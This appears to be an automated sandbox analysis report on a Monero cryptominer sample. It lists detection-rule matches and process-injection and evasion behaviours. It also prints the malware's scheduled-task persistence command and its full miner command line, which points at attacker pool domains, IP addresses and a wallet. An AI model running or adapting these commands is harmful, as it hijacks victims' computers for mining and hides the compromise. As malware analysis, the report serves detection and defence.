Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Detected potential crypto function
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFE106 1_2_0000025F5EFFE106
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFE4D6 1_2_0000025F5EFFE4D6
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFE90E 1_2_0000025F5EFFE90E
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFD4D2 1_2_0000025F5EFFD4D2
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EFFED6A 1_2_0000025F5EFFED6A
Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFA36125E22 1_2_00007FFA36125E22
Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFA36125076 1_2_00007FFA36125076
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FE4D6 9_2_000002C94E2FE4D6
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FE106 9_2_000002C94E2FE106
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FE90E 9_2_000002C94E2FE90E
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FD4D2 9_2_000002C94E2FD4D2
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E2FED6A 9_2_000002C94E2FED6A
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36149B74 9_2_00007FFA36149B74
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA361467BC 9_2_00007FFA361467BC
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36145E22 9_2_00007FFA36145E22
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36145076 9_2_00007FFA36145076
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA36144B79 9_2_00007FFA36144B79
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FE4D6 15_2_000002A7810FE4D6
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FE106 15_2_000002A7810FE106
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FE90E 15_2_000002A7810FE90E
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FD4D2 15_2_000002A7810FD4D2
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A7810FED6A 15_2_000002A7810FED6A
Contains functionality to call native functions
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401D58 NtAllocateVirtualMemory, 0_2_00401D58
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401D18 NtWriteVirtualMemory, 0_2_00401D18
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_004019D8 NtCreateThreadEx, 0_2_004019D8
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401D98 NtProtectVirtualMemory, 0_2_00401D98
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00401C98 NtClose, 0_2_00401C98
Source: C:\Windows\System32\conhost.exe Code function: 9_2_00007FFA3614A30E NtUnmapViewOfSection, 9_2_00007FFA3614A30E
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401D58 NtAllocateVirtualMemory, 13_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401D18 NtWriteVirtualMemory, 13_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_004019D8 NtCreateThreadEx, 13_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401D98 NtProtectVirtualMemory, 13_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00401C98 NtClose, 13_2_00401C98
Creates driver files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: pcNCraWcRk.exe Virustotal: Detection: 64%
Source: pcNCraWcRk.exe Metadefender: Detection: 31%
Source: pcNCraWcRk.exe ReversingLabs: Detection: 81%
Source: pcNCraWcRk.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\pcNCraWcRk.exe 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: WR64.sys.9.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.evad.mine.winEXE@26/6@2/1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: pcNCraWcRk Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: pcNCraWcRk.exe Static file information: File size 2234368 > 1048576
Source: pcNCraWcRk.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00623B00 push rax; retf 0_2_00623B01
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00623BFF push rax; iretd 0_2_00623C01
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_006238C0 push rax; retn 0009h 0_2_006238C1
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Code function: 0_2_00623AB7 push rax; retf 0009h 0_2_00623AC1
Source: C:\Windows\System32\conhost.exe Code function: 1_2_0000025F5EDE0000 push es; iretd 1_2_0000025F5EDE0098
Source: C:\Windows\System32\conhost.exe Code function: 9_2_000002C94E0E0000 push es; iretd 9_2_000002C94E0E0098
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00409B00 push rax; retf 13_2_00409B01
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_004098C0 push rax; retn 0009h 13_2_004098C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00409BFF push rax; iretd 13_2_00409C01
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 13_2_00409AB7 push rax; retf 0009h 13_2_00409AC1
Source: C:\Windows\System32\conhost.exe Code function: 15_2_000002A780EE0000 push es; iretd 15_2_000002A780EE0098

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Drops PE files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 35000
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.23.214.117 144
Source: C:\Windows\explorer.exe Domain query: xmr.givemexyz.in
Writes to foreign memory regions
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Memory written: C:\Windows\System32\conhost.exe base: 25F5EDE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 2C94E0E0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 886010
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 2A780EE0000
